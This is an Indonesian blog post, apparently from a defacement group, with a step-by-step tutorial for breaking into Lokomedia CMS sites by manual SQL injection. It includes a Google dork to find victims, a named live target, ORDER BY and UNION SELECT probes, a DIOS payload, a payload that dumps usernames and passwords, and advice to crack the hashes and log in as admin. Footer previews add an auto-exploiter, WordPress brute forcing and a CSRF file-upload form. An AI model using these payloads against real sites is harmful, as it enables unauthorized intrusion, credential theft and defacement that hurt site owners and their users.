Skip to main content

Deface Dengan Metode Sql Lokomedia Manual


Yo wasap Plen :v kali ini gw mau ngasih turtor cara depes dengan metode sql lokmed manual. Langsung aja lah :v

Siapin bahan" dolo :
Dork : inurl://statis-1 ext:html
(kembangin ea biar dapet perawan, masak dapet janda mulu kan asw :v)
ubah angka nya 1-100 terserah ente :v
Admin finder : Cari di google atau bisa install di hp klean pakek termux  DI SENE
Hashkiller : DI SENE
Kopi/Teh/Susu/Es/Tisu bebas dah :v
Yok langsung sadja :v

1. Dorking lah pakek dork diatas di mbah gugel :v


2. Pilih salah satu target yang mau di eue :v
Nih Live Target buat di EUE :v : http://ciptaabadi.net/statis-1-profil.html

3. Tambahin tanda (') tanpa tanda kurung di akhir kata profil. Contoh kek gini : http://ciptaabadi.net/statis-1-profil'.html
Vuln tandanya? Kek dibawah ini


4. Kalau udah kek gitu skarang kita order by buat nyari error :v
Contoh :
http://ciptaabadi.net/statis-1-profil'+order+by+1--+-.html -> Normal
http://ciptaabadi.net/statis-1-profil'+order+by+2--+-.html -> Normal
http://ciptaabadi.net/statis-1-profil'+order+by+3--+-.html -> Normal
http://ciptaabadi.net/statis-1-profil'+order+by+4--+-.html -> Normal
http://ciptaabadi.net/statis-1-profil'+order+by+5--+-.html -> Normal
http://ciptaabadi.net/statis-1-profil'+order+by+6--+-.html -> Error


5. Brarti sampek 5 sadja ea :v tinggal nyari angka Togel nya :v
Masukin : +union+select+1,2,3,4,5--+- (jangan lupa tambahin . di depan angka)
Contoh : http://ciptaabadi.net/statis-.1-profil'+union+select+1,2,3,4,5--+-.html

6. Nah kliatan tuh angka togel nya 2 :v Langsung sadja ea kita DIOS :v
ganti angka 2 dengan kode berikut

(/*!50000select*/(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(/*!50000select*/(0)from(information_schema.columns)/*!50000where*/(table_schema=database())and(0x00)in(@x:=/*!50000concat*/+(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x)

Contoh : http://ciptaabadi.net/statis-.1-profil'+union+select+1,(/*!50000select*/(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(/*!50000select*/(0)from(information_schema.columns)/*!50000where*/(table_schema=database())and(0x00)in(@x:=/*!50000concat*/+(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x),3,4,5--+-.html






7. Nah dah kluar tuh >.< Skarang di Dump ea
Masukin kode berikut menggantikan kode dios tdi : (/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(users)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x)

Contoh : http://ciptaabadi.net/statis-.1-profil'+union+select+1,(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(users)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x),3,4,5--+-.html

8. Nah kluar tuh id sama pass nya :v Tinggal di Hash pass nya lalu cari admin Login nya :v


Kalo gk bisa nemu admin Login, Jedorin pala lu ke tembok :v
Sekian dari ane ea :v
Kalo bingung tinggal koment ea :v
Maap kalo kurang jelas/ada yang salah penulisan :v Capek njer :v
Thanks for Badut Galau :v





Comments

Popular posts from this blog

XAttacker Website Vulnerability Scanner & Auto Exploiter 

squadcyber.org - XAttacker adalah Website Vulnerability Scanner & Auto Exploiteryang di tulis dalam bahasa pemrograman Perl untuk menganalisis sebuah celah web dan meng eksploitasi nya secara otomatis. Tool ini fungsi nya hampir sama seperti yang gw posting sebelum nya yaitu Mr. Spy Bot Auto Deface   . Fitur   Auto Cms Detect [1] WordPress : [+] Adblock Blocker [+] WP All Import [+] Blaze [+] Catpro [+] Cherry Plugin [+] Download Manager [+] Formcraft [+] Power Zoomer [+] Gravity Forms [+] Revslider Upload Shell [+] Revslider Dafece Ajax [+] Revslider Get Config [+] Showbiz [+] Simple Ads Manager [+] Slide Show Pro [+] WP Mobile Detector [+] Wysija [+] InBoundio Marketing [+] dzs-zoomsounds [+] Reflex Gallery [+] Creative Contact Form [+] Work The Flow File Upload [+] WP Job Manger [+] PHP Event Calendar [+] Synoptic [+] Wp Shop [+] Content Injection [2] Joomla [+] Com Jce [+] Com Media [+] Com Jdownloads ...

Deface Wordpress Bruteforce dengan WPScan

squadcyber.org  - Kali ini gw bagiin tutorial Deface Wordpress Bruteforce dengan WPScan, kenapa WPScan ? kenapa nggak pake tools yang lainnya?. Karena menurut gw tool yang paling manjur untuk Penetration Testing sebuah web yang menggunakan CMS Wordpress adalah WPScan, dan WPScan sering melakukan update pada database nya sehingga bisa memberikan refrensi untuk bug yang di dapat pada waktu scan bug di web tersebut dan bisa meng eksploitasi Web yang menggunakan CMS Wordpress terbaru. Bahan - Bahan  - WPScan ( Untuk Windows bisa kalian lihat di sini , dan untuk android bisa kalian lihat Di sini  )  - Wordlist ( Download Di sini  atau kalian bisa buat sendiri) Dork    - inurl:/wp-login.php (kembangin lagi) Cara Deface Wordpress Bruteforce kali ini gw pake Termux ( android ) karena minim nya fasilitas yang ada :v. Pertama kalian busa folder wpscan nya dengan mengetik $ cd wpscan Setelah masuk di folder wpscan nya , kita scan dulu ...

Deface Dengan Metode Wordpress Plugin DreamWorkGallery

www.squadcyber.org - Yo guys, balik lagi ma ane :v kali ini wa mau kasih tutor pepes pakek metode  Wordpress Plugin DreamWorkGallery. Langsung yok :v Bahan" : Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/ (kembangin ea) CSRF : <form action="http://www.site.co.li/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value=""/> <input type="submit" value="SIKAT!" /></form>  Langsung :v 1. Dorking pakek dork diatas   2. Kalo gini vuln :v Copy url web nya doang. Lalu masukin di CSR...